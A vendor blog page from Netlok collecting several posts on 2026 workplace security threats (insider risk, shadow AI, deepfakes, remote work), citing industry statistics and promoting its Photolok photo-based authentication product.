Photolok Offer
Want to see how Photolok can help secure your organization’s AI-powered future? Request Your Personalized Demo Today.
About the Author
Kasey Cromer is Director of Customer Experience at Netlok.
Sources
[1] PwC. “AI Agent Survey.” May 2025. https://www.pwc.com/us/en/tech-effect/ai-analytics/ai-agent-survey.html
[2] Gartner. “Gartner Predicts 40% of Enterprise Apps Will Feature Task-Specific AI Agents by 2026.” August 2025. https://www.gartner.com/en/newsroom/press-releases/2025-08-26
[3] OWASP GenAI Security Project. “OWASP Top 10 for Agentic Applications for 2026.” December 2025. https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/
[4] Forrester. “Predictions 2026: Cybersecurity and Risk.” October 2025. https://www.forrester.com/blogs/predictions-2026-cybersecurity-and-risk/
[5] Stellar Cyber. “Top Agentic AI Security Threats in 2026.” December 2025. https://stellarcyber.ai/learn/agentic-ai-securiry-threats/
[6] G2. “Enterprise AI Agents Report: Industry Outlook for 2026.” December 2025. https://learn.g2.com/enterprise-ai-agents-report
[7] CyberArk. “AI Agents and Identity Risks: How Security Will Shift in 2026.” December 2025. https://www.cyberark.com/resources/blog/ai-agents-and-identity-risks-how-security-will-shift-in-2026
[8] BleepingComputer. “The Real-World Attacks Behind OWASP Agentic AI Top 10.” January 2026. https://www.bleepingcomputer.com/news/security/the-real-world-attacks-behind-owasp-agentic-ai-top-10/
[9] Omdia/Dark Reading. “Identity Security 2026: Predictions and Recommendations.” January 2026. https://www.darkreading.com/identity-access-management-security/identity-security-2026-predictions-and-recommendations
[10] SecurityWeek. “Rethinking Security for Agentic AI.” January 2026. https://www.securityweek.com/rethinking-security-for-agentic-ai/
[11] Cloud Security Alliance. “Top 10 Predictions for Agentic AI in 2026.” January 2026. https://cloudsecurityalliance.org/blog/2026/01/16/my-top-10-predictions-for-agentic-ai-in-2026
[12] McKinsey. “The State of AI in 2025: Agents, Innovation, and Transformation.” November 2025. https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai
[13] Salesforce. “Artificial Intelligence Acceptable Use Policy.” December 2025. https://www.salesforce.com/company/legal/agreements/
[14] Salesforce. “Model Containment Policy.” January 2026.
[15] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/
[16] MIT/CIO. “2026: The Year AI ROI Gets Real.” January 2026. https://www.cio.com/article/4114010/2026-the-year-ai-roi-gets-real.html
[17] Astrix Security. “The OWASP Agentic Top 10 Just Dropped: Here’s What You Need to Know.” December 2025. https://astrix.security/learn/blog/the-owasp-agentic-top-10-just-dropped-heres-what-you-need-to-know/
[18] Giskard. “OWASP Top 10 for Agentic Applications 2026: Security Guide.” December 2025. https://www.giskard.ai/knowledge/owasp-top-10-for-agentic-application-2026
[19] Palo Alto Networks. “OWASP Top 10 for Agentic Applications 2026 Is Here.” December 2025. https://www.paloaltonetworks.com/blog/cloud-security/owasp-agentic-ai-security/
[20] ActiveFence. “OWASP Top 10 for Agentic AI.” December 2025. https://www.activefence.com/blog/owasp-top-10-agentic-ai/
Kasey Cromer, Netlok | January 15, 2026
The uncomfortable truth about workplace security in 2026 is that the biggest threat probably isn’t some hacker halfway around the world. It’s the 1) employee who already has access to your systems, 2) AI tool someone downloaded without telling IT, or 3) remote worker logging in from a coffee shop with sketchy Wi-Fi. This blog explores these converging threats facing organizations in 2026 and why traditional defenses are failing. The facts are:
| Metric | Finding | Source |
| Security leaders saying risk has never been higher | 72% | Vanta 2025 |
| Average annual cost of insider incidents | $17.4 million | Ponemon 2025 |
| Days to detect and contain insider incident | 81 days | Ponemon 2025 |
| Companies reporting AI powered attacks increased | 50% | Vanta 2025 |
| Organizations with formal AI security policies | Only 44% | Vanta 2025 |
| Organizations reporting physical security breaches | Over 60% | Zona Facta 2025 |
Security folks have been warning about “evolving threats” for years. But 2026 really is different. The reason? AI stopped being experimental. Google Cloud’s Cybersecurity Forecast 2026 puts it bluntly: attackers have “fully embraced AI.” They’re not dabbling anymore. They’re using it to craft perfect phishing emails, generating deepfake videos of executives, and cracking passwords faster than we ever thought possible.
According to Vanta’s State of Trust Report, 72% of security leaders now say risk has never been higher. That’s up from 55% just a year ago. These aren’t people prone to panic. They’re professionals watching the threat landscape shift beneath their feet in real time.
What concerns me most? SecurityWeek predicts that deepfakes have gotten “good enough and cheap enough to convincingly impersonate executives.” Think about what that means. When your CFO gets a video call from the CEO asking for an urgent wire transfer, how do they actually know it’s the real CEO on the other end? The visual and audio cues we’ve relied on for decades to verify identity are becoming meaningless.
Remember shadow IT? Back when employees started using Dropbox and Google Docs without permission because the company tools were too clunky? We’re seeing the exact same pattern with AI now, except the stakes are dramatically higher.
IBM is predicting that there will be “major security incidents where sensitive IP is compromised through shadow AI systems” this year. Here’s what’s happening in practice: employees are feeding proprietary data into ChatGPT and other tools without thinking twice. Marketing is using AI to draft customer communications. Engineering is debugging code with AI assistants. Legal is summarizing contracts. And IT often has absolutely no idea any of it is happening. Each of these interactions potentially exposes company secrets data and other system & company information to systems they don’t control.
But it gets even stranger. Palo Alto Networks warns that AI agents themselves are becoming insider threats. These autonomous systems can access privileged data, operate around the clock, and if misconfigured, cause damage at machine speed. We’re not just worried about rogue employees anymore. We’re worried about rogue algorithms that never sleep and can process thousands of transactions before anyone notices something is wrong.
The Ponemon Institute’s latest research delivers some brutal numbers: inside related incidents cost companies an average of $17.4 million per year. It takes an average of 81 days just to detect and contain these threats. That’s nearly three months of damage accumulating before you even realize something is wrong. And the longer it takes, the worse it gets. Incidents that drag past 90 days cost nearly $19 million per company on average.
Here’s a twist that sounds like something from a spy novel: Security Boulevard reports that real human operatives, not bots or AI, are now getting hired as remote employees. They use stolen identities to pass interviews and background checks, then gain completely legitimate access to company systems. North Korean operatives have already pulled this off at multiple Western companies. Your next security breach might come from someone sitting in your own Slack channels, attending your team meetings, and collecting a paycheck while they exfiltrate your data.
DTEX Systems’ 2026 forecast emphasizes something important: insider risk is no longer confined to malicious employees. It now includes unmanaged AI use, machine identities, agentic systems, and coordinated nation state infiltration. The old categories we used to think about insider threats have basically exploded. The boundary between “inside” and “outside” barely means anything when your attack surface includes every AI tool, every remote connection, and every automated system with access to your network.
By now, nearly 70% of the global workforce works remotely at least part of the time. That means your security perimeter now includes every employee’s home network, their local coffee shop, that hotel Wi-Fi they used on vacation while “just checking email real quick,” and every personal device that’s ever connected to company resources.
Vena Solutions found that 42% of organizations got hit by successful phishing attacks where remote workers were targeted in 2025. And here’s the part that should worry every security leader: only 6% of organizations feel confident they’ve actually covered all their security gaps. That’s a whole lot of hope and not much certainty. Most companies are essentially crossing their fingers and hoping their distributed workforce doesn’t accidentally open the door to attackers.
With all the focus on cyber threats, it’s easy to forget that physical security is still a massive concern. Medical Economics reports that healthcare workers are getting attacked at alarming rates. A staggering 91% of emergency physicians reported being threatened or assaulted in the past year. California’s new SB 553 law now requires most employers to have written workplace violence prevention plans, and other states are following with similar legislation.
According to Zona Facta’s analysis, over 60% of all organizations experienced a physical security breach last year, costing mid-sized companies around $450,000 per incident. Yet only 20% have an updated, documented security strategy. That disconnect between the reality of the risk and the preparedness to handle it is a serious problem that needs attention.
Every security incident I’ve described, whether it’s a hacker, a rogue employee, a deepfake scam, or a nation state operative, eventually comes down to one thing: authentication. Someone got access they shouldn’t have. And our current methods are failing badly.
Passwords get phished, guessed, or cracked by AI in seconds. SMS based two factor authentication are vulnerable to SIM swapping attacks that are easier to pull off than most people realize. Even biometrics have serious problems. You can’t exactly change your fingerprints or retina scan if that data gets compromised. Once it’s stolen, it’s stolen forever.
This is exactly why we built Photolok at Netlok. Instead of passwords or static credentials that can be stolen, Photolok uses photos you select with encrypted codes embedded through steganography. The photos are randomize every session, so there’s no pattern for AI to learn or attackers to exploit. And unlike a password, which requires creating and memorizing something new, or a biometric, where you quickly run out of options, you can swap your Photolok photos in seconds. If you think something might be compromised, just pick new photos and you’re secure again immediately.
We also built in a Duress Photo feature that addresses a scenario most security tools completely ignore. If someone forces you to log in, whether that’s a robbery, coercion, or an emergency situation, you select a designated photo that grants access but silently alerts security and/or IT that something is wrong. The system lets you comply with the threat while simultaneously calling for help. It’s the kind of feature you hope you never need, but you’ll be grateful it exists if you ever do.
In an era where AI, insiders, and remote work all converge on authentication as the weakest link, Photolok gives you a modern control point that attackers can’t easily mimic, phish, or reuse. It’s authentication built for the threats of 2026, not the threats of earlier times.
Here’s what keeps me up at night: being able to catch an insider threat early versus late the impact can be enormous. Ponemon found that incidents resolved within 31 days cost around $10.6 million on average. Let them drag past 90 days and you’re looking at nearly $19 million. That’s not a rounding error. The $10 million loss may well end your career as well.
BlackFog reports that 77% of corporate boards have now discussed the material and financial implications of cybersecurity incidents. That’s up 25 percentage points since 2022. Security failures aren’t just IT problems buried in some technical report anymore. They’re board level governance issues that can tank stock prices and destroy reputations overnight.
Forrester is predicting that 2026 will see agentic AI cause a major public breach. When that happens, and it’s a matter of when not if, every executive is going to be asking their security team if they are prepared and if not, why not.. The organizations that took action early will have answers. The ones that waited will be scrambling to explain why they ignored all the warning signs.
If you’re responsible for security at your organization, here’s where to focus:
The workplace security landscape in 2026 is messy, complicated, and honestly frightening. AI is supercharging attacks in ways we’re only beginning to understand. Insiders, both human and algorithmic, pose risks that traditional security tools weren’t designed to handle. And the permanent shift to hybrid work has expanded what you need to protect far beyond any physical office.
But here’s what I keep telling people: the organizations that act now, rather than waiting for a breach to force their hand, will be the ones that come out ahead. The question isn’t whether you’ll face these threats. It’s whether you’ll be ready when they arrive.
Want to see how Photolok can help protect your organization?
Request Your Personalized Demo
Kasey Cromer is Director of Customer Experience at Netlok.
[1] Google Cloud. “Cybersecurity Forecast 2026.” November 2025. https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2026/
[2] Vanta. “Top 6 AI Security Trends for 2026.” December 2025. https://www.vanta.com/resources/top-ai-security-trends-for-2026
[3] SecurityWeek. “Five Cybersecurity Predictions for 2026.” December 2025. https://www.securityweek.com/five-cybersecurity-predictions-for-2026-identity-ai-and-the-collapse-of-perimeter-thinking/
[4] IBM. “Cybersecurity Trends: Predictions for 2026.” December 2025. https://www.ibm.com/think/news/cybersecurity-trends-predictions-2026
[5] Palo Alto Networks / Harvard Business Review. “6 Cybersecurity Predictions for the AI Economy in 2026.” December 2025. https://hbr.org/sponsored/2025/12/6-cybersecurity-predictions-for-the-ai-economy-in-2026
[6] Ponemon Institute. “2025 Cost of Insider Risks Global Report.” 2025. https://ponemon.dtexsystems.com/
[7] Security Boulevard. “Security Predictions 2026: Insider Risk & Trust.” January 2026. https://securityboulevard.com/2026/01/security-predictions-2026-insider-risk-trust/
[8] DTEX Systems. “2026 Cybersecurity Predictions.” December 2025. https://www.dtexsystems.com/blog/2026-cybersecurity-predictions/
[9] Baarez Technology Solutions. “Cybersecurity for Hybrid Workforces.” April 2025. https://baarez.com/cybersecurity-risks-for-hybrid-workforces-in-2025/
[10] Vena Solutions. “Remote Work Statistics and Trends for 2026.” November 2025. https://www.venasolutions.com/blog/remote-work-statistics
[11] Medical Economics. “Workplace Violence Prevention in 2026.” November 2025. https://www.medicaleconomics.com/view/6-tips-for-strengthening-workplace-violence-prevention-in-2026-and-beyond
[12] Zona Facta. “Reassess Your Workplace Security Strategy Before 2026.” November 2025. https://zonafacta.com/how-to-reassess-your-workplace-security-strategy-before-2026/
[13] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/
[14] BlackFog. “Enterprise Cybersecurity in 2026.” December 2025. https://www.blackfog.com/enterprise-cybersecurity-2026-strategies-trends/
[15] Forrester. “Predictions 2026: Cybersecurity and Risk.” October 2025. https://www.forrester.com/blogs/predictions-2026-cybersecurity-and-risk/
Kasey Cromer, Netlok | January 5, 2026
Executive Summary
Insider threats now cost an average of $17.4 million annually per enterprise, and 93% of security leaders say these attacks are harder to detect than external breaches. The uncomfortable truth: your most significant security vulnerability isn’t a sophisticated hacker probing your perimeter. It’s the trusted employee, contractor, or compromised credential holder who already has the keys to your kingdom. As AI-powered attacks accelerate and traditional authentication methods fail, organizations must fundamentally rethink how they verify identity at the point of access.
Predictions at a Glance
| Metric | Finding | Source |
| Average annual cost of insider incidents per enterprise | $17.4 million | Ponemon Institute 2025 [1] |
| Organizations experiencing insider incidents in past year | 83% | Cybersecurity Insiders 2024 [2] |
| Security leaders who find insider threats harder to detect than external attacks | 93% | Cybersecurity Insiders 2025 [3] |
| Breaches involving stolen credentials | 22% | Verizon DBIR 2025 [4] |
| Average days to detect and contain an insider incident | 81 days | Ponemon Institute 2025 [1] |
| Cost of incidents taking 91+ days to contain | $18.7 million | Ponemon Institute 2025 [1] |
| Organizations confident in preventing insider threats before damage occurs | 23% | Cybersecurity Insiders 2025 [3] |
The Insider Threat Problem Is Getting Worse
When CrowdStrike, one of the world’s leading cybersecurity firms, announced in November 2025 that it had terminated an employee for sharing internal screenshots with hackers, it sent shockwaves through the industry [5]. If a company whose entire business model revolves around stopping breaches can be compromised from within, what chance does the average enterprise have?
The incident wasn’t isolated. The threat group known as Scattered Lapsus$ Hunters reportedly paid $25,000 for the insider’s cooperation, seeking authentication cookies and access to internal dashboards [6]. The attackers didn’t need zero-day exploits or sophisticated malware. They needed one person with legitimate access willing to provide critical information and look the other way.
This is the new reality of enterprise security. According to the World Economic Forum’s Global Cybersecurity Outlook 2025, identity theft has climbed to the top of the agenda, emerging as the primary cyber risk concern for both CISOs and CEOs [7]. The report notes that 72% of respondents say cyber risks have risen in the past year, with identity theft and credential compromise driving much of that increase.
Why Traditional Security Can’t Stop Insiders
The fundamental challenge with insider threats is deceptively simple: insiders already have authorized access. They know where sensitive data lives. They understand your security controls and their blind spots. Traditional perimeter defenses are useless against someone who legitimately belongs inside the perimeter.
The Verizon 2025 Data Breach Investigations Report underscores this vulnerability. Stolen credentials were the initial access vector in 22% of all breaches analyzed, and a staggering 88% of basic web application attacks involved the use of stolen credentials [4]. Once an attacker logs in with valid credentials, even robust firewalls and VPNs become irrelevant.
The detection gap is equally troubling. The 2025 Cybersecurity Insiders report found that 93% of organizations say insider threats are as difficult or harder to detect than external cyberattacks [3]. Only 21% extensively integrate behavioral indicators such as HR signals, financial stress, and psychosocial context into their detection programs. The result? Organizations are watching shadows while the real danger moves unchecked.
The Three Types of Insider Threats Bypassing Your Defenses
Understanding how insiders bypass security requires recognizing the three distinct threat profiles that enterprises face:
The Negligent Insider represents the most common category. According to Ponemon Institute research, 55% of insider incidents stem from employee negligence [1]. These aren’t malicious actors; they’re frustrated workers circumventing clunky security controls to meet deadlines, sharing passwords for convenience, or falling victim to sophisticated phishing attacks. The 2025 cost of negligent insider per incident reached $8.8 million annually.
The Malicious Insider acts with deliberate intent. The cost per malicious insider incident reached $715,366 in 2025 [8]. These individuals exploit their knowledge of internal systems and security measures to steal data, sabotage operations, or sell access to external threat actors as the CrowdStrike case demonstrated.
The Compromised Insider blurs the line between internal and external threats. This rapidly growing category occurs when an employee’s credentials are stolen through phishing, infostealers, or social engineering. The attacker then operates under the guise of a legitimate, trusted user. Verizon’s DBIR found that 54% of ransomware victims had their company domains appear in stolen credential databases, and 40% had corporate email addresses exposed in those same breaches [4].
AI Is Accelerating the Threat
The artificial intelligence revolution has fundamentally altered the threat calculus. The World Economic Forum reports that nearly 47% of organizations view adversarial advances powered by generative AI as their primary concern [7]. AI-driven deepfake technology allows criminals to impersonate individuals with deceptive accuracy, potentially bypassing verification systems that rely on static credentials or predictable biometric patterns.
The 2025 Cybersecurity Insiders report highlights growing concern about AI-enabled insider risks [3]: 60% of organizations are highly concerned about employees misusing AI tools, and the leading worries include deepfake phishing and social engineering (69%), automated data exfiltration (61%), and AI-assisted credential abuse (53%).
Traditional passwords offer no defense against these evolving attacks. AI password crackers can now breach most passwords in seconds and complex ones in minutes. When combined with social engineering techniques, AI tools can decipher credentials far more quickly than earlier systems, making password-based authentication effectively obsolete against determined adversaries.
The Authentication Failure Point
Every insider threat incident shares a common vulnerability: the authentication layer. Whether credentials are stolen through infostealers, purchased on the dark web, or simply observed over a shoulder, the point of entry remains the same. Once past the login gate, insiders have freedom to operate.
The problem with conventional authentication methods is their predictability. Passwords can be guessed, phished, or cracked. SMS-based multi-factor authentication is vulnerable to SIM swapping. Even biometrics present challenges; once compromised, they cannot be changed. The Verizon DBIR explicitly recommends against SMS one-time passwords for MFA, noting their vulnerability to bypass techniques [4].
MFA bypass has become a sophisticated attack category. Techniques like prompt bombing (flooding users with authentication requests until they accept), adversary-in-the-middle attacks (intercepting MFA prompts in real-time), and token theft are becoming standard tools for threat actors. The DBIR found that these MFA bypass techniques appeared in a significant percentage of breach incidents.
A Different Approach: Authentication Designed for the AI Era
Addressing insider threats requires authentication that operates on fundamentally different principles. These systems must be designed from the ground up to resist both human manipulation and AI-powered attacks.
Photolok, developed by Netlok, represents this new paradigm in enterprise authentication. Rather than relying on static secrets that can be stolen or replicated, Photolok replaces passwords with user-selected photos that contain embedded encrypted codes using steganography. And unlike biometrics or static passwords, users can easily update their photos at any time, making credential reset simple and immediate. This approach addresses the core vulnerabilities that make traditional authentication susceptible to insider compromise.
The system’s UltraSafe AI/ML login protection is particularly relevant in today’s threat environment. Photolok leverages the “Picture-Superiority Effect,” the scientifically proven principle that humans remember images far better than text, with randomizing photos and embedded codes every session [9]. Because login selections are based on unique, personally meaningful photos rather than static data or predictable biometric patterns, AI and machine learning tools cannot identify or learn patterns to exploit. Even with large datasets, attackers cannot brute-force or simulate a user’s photo selection.
For organizations concerned about coerced access, a scenario where an insider is forced to authenticate under duress, Photolok offers a unique Duress Photo feature that functions as a visual silent alarm. When an account owner feels endangered or forced to provide access, they can select their designated duress photo. The system grants access normally while simultaneously alerting security administrators that the account may be compromised and the user may need assistance [10].
The 1-Time Use Photo capability addresses another common insider attack vector: shoulder surfing and observation attacks. In public or office environments where screens may be visible, users can designate photos for single-use authentication, defeating replay attacks and making credential theft through observation ineffective.
Building Resilience Against Insider Threats
Effective insider threat management requires more than technology; it demands a comprehensive approach that combines preventive controls with detective capabilities. The Ponemon Institute research found that organizations with formal insider risk management programs reduced containment time significantly, with 65% reporting their program was the only security strategy that enabled them to pre-empt breaches by detecting insider risk early [1].
Key elements of a resilient insider threat program include:
Authentication that resists credential theft by eliminating static secrets attackers can steal, guess, or crack. Solutions like Photolok that use unique photo selection rather than memorized strings fundamentally change the economics of credential attacks.
Behavioral analytics that correlate cyber, physical, and organizational signals to identify potential threats before they escalate. The 2025 research shows that only 12% of organizations have mature predictive risk assessment models [3], a capability gap that creates significant exposure.
Zero trust principles that verify identity continuously rather than granting persistent access based on a single authentication event. When combined with strong initial authentication, this approach limits the damage any single compromised credential can cause.
The Cost of Inaction
The financial case for addressing insider threats is unambiguous. Organizations that detect insider risk early report significant benefits: reduced containment costs, preserved data integrity, and protected reputational capital. The contrast with delayed detection is stark, incidents taking over 91 days to contain cost an average of $18.7 million, compared to $10.6 million for those resolved within 31 days [1].
Beyond direct costs, insider incidents create cascading effects that damage customer relationships, trigger regulatory scrutiny, and undermine competitive positioning. In an era where digital trust is a strategic asset, organizations cannot afford authentication systems that remain vulnerable to their most predictable attack vector.
Taking Action
The insider threat landscape will continue to intensify as AI capabilities advance and hybrid work models expand the attack surface. Organizations that wait for a breach to force action will pay the highest price in dollars, disruption, customer relations and damage to stakeholder trust.
Forward-looking security leaders are moving now to implement authentication solutions designed for the realities of AI-era threats. By replacing vulnerable password-based systems with UltraSafe authentication like Photolok, enterprises can close the authentication gap that insiders exploit while providing their workforce with a simpler, more intuitive login experience.
The question isn’t whether your organization will face insider threats. It’s whether your authentication infrastructure will stop them.
Ready to strengthen your defense against insider threats?
Request Your Personalized Demo of Photolok
About the Author
Kasey Cromer is Director of Customer Experience at Netlok.
Sources
[1] Ponemon Institute. “2025 Cost of Insider Risks Global Report.” February 2025. https://ponemon.dtexsystems.com/
[2] Cybersecurity Insiders. “2024 Insider Threat Report.” 2024. https://www.cybersecurity-insiders.com/
[3] Cybersecurity Insiders and Cogility. “2025 Insider Risk Report.” November 2025. https://www.cybersecurity-insiders.com/2025-insider-risk-report-the-shift-to-predictive-whole-person-insider-risk-management/
[4] Verizon. “2025 Data Breach Investigations Report.” May 2025. https://www.verizon.com/business/resources/reports/dbir/
[5] TechCrunch. “CrowdStrike fires ‘suspicious insider’ who passed information to hackers.” November 21, 2025. https://techcrunch.com/2025/11/21/crowdstrike-fires-suspicious-insider-who-passed-information-to-hackers/
[6] SecurityWeek. “CrowdStrike Insider Helped Hackers Falsely Claim System Breach.” November 24, 2025. https://www.securityweek.com/crowdstrike-insider-helped-hackers-falsely-claim-system-breach/
[7] World Economic Forum and Accenture. “Global Cybersecurity Outlook 2025.” January 2025. https://www.weforum.org/publications/global-cybersecurity-outlook-2025/
[8] Syteca. “Insider Threat Statistics for 2025: Facts, Reports & Costs.” October 2025. https://www.syteca.com/en/blog/insider-threat-statistics-facts-and-figures
[9] Netlok. “Company Overview.” 2025. https://netlok.com/company-overview/
[10] Netlok. “How Photolok Works.” 2025. https://netlok.com/how-it-works/
Kasey Cromer, Netlok | December 4, 2025
Part 1 (November 14, 2025) took a deeper dive into the deepfake epidemic itself—the $25 million video call scams, the 1,000%+ increase in attacks since 2023, and why human detection capabilities are failing at a 75% rate. We examined why detection alone cannot win this arms race and outlined an enterprise defense framework.
In Part 2 (November 21, 2025) of this series, we examined the staggering scope of AI-powered fraud—a $40 billion crisis by 2027 that is overwhelming enterprise security teams. We explored how generative AI has transformed the fraud landscape, with 93% of financial institutions expressing serious concern about AI-driven fraud acceleration and deepfake incidents surging by 700%.
Now, in this concluding installment, we look ahead to how these same dynamics will reshape authentication between 2026 and 2028—and what security leaders can do today to get ahead of that curve. The threats documented in Parts 1 and 2 are not static; they are accelerating. As we approach 2026, enterprises face a critical turning point where the convergence of advancing AI capabilities and expanding data exposure creates unprecedented authentication challenges. The question is no longer whether to evolve your security posture, but how quickly you can implement defenses designed for the threats of tomorrow. You can’t afford to wait.
The authentication landscape stands at an inflection point. Forrester predicts an agentic AI deployment that will cause a publicly disclosed breach in 2026, while Gartner warns that by 2027. The key point is AI agents will reduce the time to exploit account exposures by 50%. As deepfake technology becomes increasingly accessible and massive data exposures amplify attacker capabilities, traditional authentication methods face obsolescence. This article examines the converging threats shaping 2026 and beyond—and demonstrates why Netlok’s Photolok, with its patented steganography, AI/ML defense, and unique user security features like Duress Photo and 1-Time Use Photo, represents the authentication paradigm shift enterprises require.
The next 12 to 24 months will reshape enterprise cybersecurity in fundamental ways-Leading research firms to issue stark warnings about what lies ahead.
Forrester’s Predictions 2026: Cybersecurity and Risk report forecasts that an agentic AI deployment will cause a publicly disclosed data breach next year, leading to employee dismissals. As organizations rush to build agentic AI workflows, the lack of proper guardrails means autonomous AI agents may sacrifice accuracy for speed—creating systemic vulnerabilities that cascade across enterprises [1].
Gartner’s analysis is equally sobering. By 2027, AI agents will accelerate the time it takes threat actors to hijack exposed accounts by 50%. The firm also predicts that 40% of social engineering attacks will target executives as well as the broader workforce by 2028, with attackers combining social engineering tactics with deepfake audio and video to deceive employees during calls [2]. Perhaps most alarming: by 2028, 25% of enterprise breaches will be traced back to AI agent abuse from both external and malicious internal actors [3].
The World Economic Forum reinforces these concerns, noting that deepfake fraud cases surged 1,740% in North America between 2022 and 2023, with financial losses exceeding $200 million in Q1 2025 alone [4]. Voice cloning now requires just 20-30 seconds of audio, while convincing video deepfakes can be created in 45 minutes using freely available software.
| Prediction | Source |
| Agentic AI will cause a public breach in 2026 | Forrester [1] |
| AI agents will reduce account exploit time by 50% by 2027 | Gartner [2] |
| 30% of enterprises will consider standalone IDV unreliable by 2026 | Gartner [5] |
| 25% of enterprise breaches traced to AI agent abuse by 2028 | Gartner [3] |
| Deepfake fraud projected to surge 162% in 2025 | Pindrop [6] |
The AI fraud threat does not exist in isolation. Its potency is directly amplified by the availability of personal data. When attackers possess comprehensive personal information—names, dates of birth, addresses, Social Security numbers, family relationships—AI-powered fraud becomes exponentially more dangerous and convincing.
Recent events have underscored how data handling practices can dramatically increase this risk. In August 2025, a whistleblower complaint revealed that personal information belonging to more than 300 million Americans had been copied to a cloud environment with reduced security controls. According to reporting from NPR and other outlets, career cybersecurity officials described the situation as “very high risk,” with one internal assessment warning of a potential “catastrophic impact” and noting the possibility of having to reissue Social Security numbers to millions of Americans in the event of a breach [7][8]. The Social Security Administration has stated that it is not aware of any compromise and that data is stored in secure environments with robust safeguards—but the episode underscores how concentrated datasets can amplify identity theft risk if controls fail.
This scenario illustrates a broader concern: as massive datasets containing sensitive personal information become more accessible—whether through breaches, mishandling, or inadequate security—AI-powered attackers gain richer raw material for their schemes. Cybersecurity experts have warned that if bad actors gained access to comprehensive personal information, they could create holistic profiles that enable highly convincing impersonation attacks [9]. The combination of detailed personal data and sophisticated deepfake technology creates what researchers have characterized as a “perfect storm” for identity fraud.
For enterprises, this means authentication systems must assume attackers may already possess significant knowledge about their targets. Traditional knowledge-based authentication—security questions, personal details, even voice recognition—becomes increasingly unreliable when attackers can synthesize convincing responses using AI trained on exposed data.
The fundamental challenge facing enterprises is that authentication methods designed for a pre-AI world are now being systematically dismantled by AI-powered attacks.
Gartner has predicted that by 2026, attacks using AI-generated deepfakes on face biometrics will mean that 30% of enterprises will no longer consider identity verification and authentication solutions reliable in isolation [5]. This represents a seismic shift in enterprise security posture—nearly one-third of organizations abandoning confidence in their existing authentication stack, with direct implications for regulatory exposure, cyber insurance, and board risk oversight.
According to Entrust’s 2026 Identity Fraud Report, deepfakes now account for one in five biometric fraud attempts, with deepfaked selfies increasing by 58% in 2025 and injection attacks surging 40% year-over-year [10]. The report notes that coercion attacks are particularly difficult to detect because victims use their own genuine documents and biometrics—only under pressure or instruction from someone else. The report’s conclusion is blunt: “We’ve crossed a threshold where humans simply can’t rely on their senses anymore.”
The passwordless movement, while representing progress, does not fully address these challenges. A recent CNBC report notes that 92% of CISOs have implemented or are planning passwordless authentication—up from 70% in 2024 [11]. However, many passwordless solutions rely on biometrics that are increasingly vulnerable to deepfake attacks, or on device-based authentication that can be compromised through social engineering.
What enterprises need is not simply “passwordless” authentication, but authentication that is fundamentally resistant to AI-powered attacks—systems where there is no pattern for AI to learn, no biometric to fake, and no knowledge to extract.
Photolok represents a fundamentally different approach to authentication—one designed from the ground up to resist the AI-powered threats that are rendering traditional methods obsolete.
At its core, Photolok is a passwordless authentication solution using patented steganographic photos. Rather than relying on passwords, biometrics, or knowledge-based verification, users authenticate by selecting their coded photos during login. This approach delivers what Netlok describes as “UltraSafe AI/ML login protection” when compared to passwords, passkeys, and biometrics.
Photolok’s AI/ML Defense capability prevents artificial intelligence and machine learning attacks through a simple but powerful principle: randomization. All account photos are randomly placed in photo panels during each login. Because there is no consistent pattern—no predictable sequence or positioning—bots cannot identify which photographs to attack. This randomized, non-predictable login experience deprives agentic AI of the consistent patterns and replayable signals it needs to optimize attacks over time. This fundamentally differs from biometrics (which present a consistent target), passwords (which can be captured or guessed), and behavioral patterns (which can be learned and mimicked).
In an era of sophisticated social engineering and physical coercion attacks, Photolok offers a capability no other authentication system provides: the Duress Photo.
Photolok is the only login method that uses a “visual silent alarm.” When an account owner feels they are in danger or is being forced to provide access to a bad actor, they can activate the Duress Security Alert by selecting their designated Duress photo in the first photo panel. When clicked, an email and text notification are sent immediately to IT security and other designated personnel—all while allowing the user to continue to login to their destination without any disruption that might alert the attacker.
This capability addresses a critical gap in enterprise security. As Entrust notes, coercion attacks are particularly hard to detect because victims use their own documents and biometrics under pressure; a Duress Photo gives those victims a safe, covert signal path that traditional biometrics simply do not offer. For example, if a finance leader is pressured into disclosing confidential information on a video call by a convincing deepfake impersonation, they can silently trigger Duress while “complying” with the request—enabling immediate response from security teams while preventing the authorization of fraudulent transactions.
Photolok is also the only login method that gives users the option of using a temporary photo to prevent shoulder surfing in office or public settings. The 1-Time Use Photo provides enhanced remote security by automatically removing itself from the user’s account after a single use.
If someone is using a camera, screen capture malware, or simply looking over a user’s shoulder, the 1-Time Photo protects the account because it becomes invalid immediately after use. If someone records or screenshares a login session, that 1-Time Use Photo is useless on the next attempt. This feature is particularly valuable for remote workers, traveling executives, and any scenario where login activity might be observed—addressing vulnerabilities that traditional authentication methods cannot mitigate.
Beyond these distinctive capabilities, Photolok incorporates additional security measures, including integration with existing authenticators for access codes, device authorization controls, and patented steganography that embeds encrypted codes within photos—making them highly resistant to external observation and AI analysis. The system also simplifies adoption across diverse user groups, eliminating language and literacy barriers that can limit the effectiveness of text-based authentication.
The World Economic Forum has stated plainly that traditional verification methods are “no longer sufficient” against AI-enabled fraudsters [12]. That aligns with the conclusion from Part 1 of this series: detection alone cannot close the gap against adaptive, AI-enabled adversaries; the underlying authentication factor must change. Global cybercrime now represents a $10.5 trillion industry—larger than the GDP of every country except the United States and China. Deloitte projects AI-enabled fraud losses in the U.S. will reach $40 billion by 2027.
The research is clear: enterprises that delay authentication modernization face mounting risk—in incident costs, regulatory exposure, and erosion of customer trust. As this three-part series has documented, the AI fraud threat is not theoretical—it is present, accelerating, and systematically defeating legacy security measures.
The choice facing enterprise leaders is straightforward: evolve authentication now, implement systems designed for AI-era threats, or become another statistic in the growing tally of successful AI-powered attacks. Photolok’s patented steganography technology, combined with unique security features like Duress Photo and 1-Time Use Photo, offers a proven path forward—authentication that protects against the threats of 2026 and beyond.
Don’t wait for AI-powered fraudsters to target your organization. Discover how Photolok’s patented steganography and AI-resistant authentication can protect your enterprise while improving user experience.
Request Your Personalized Demo
Author: Kasey Cromer is Director of Customer Experience at Netlok.
[1] Predictions 2026: Cybersecurity and Risk — Forrester (October 2025)
[4] Detecting dangerous AI is essential in the deepfake era — World Economic Forum (July 2025)
[6] Deepfake Fraud Could Surge 162% in 2025 — Pindrop (July 2025)
[7] Whistleblower says DOGE put Social Security numbers at risk — NPR (August 2025)
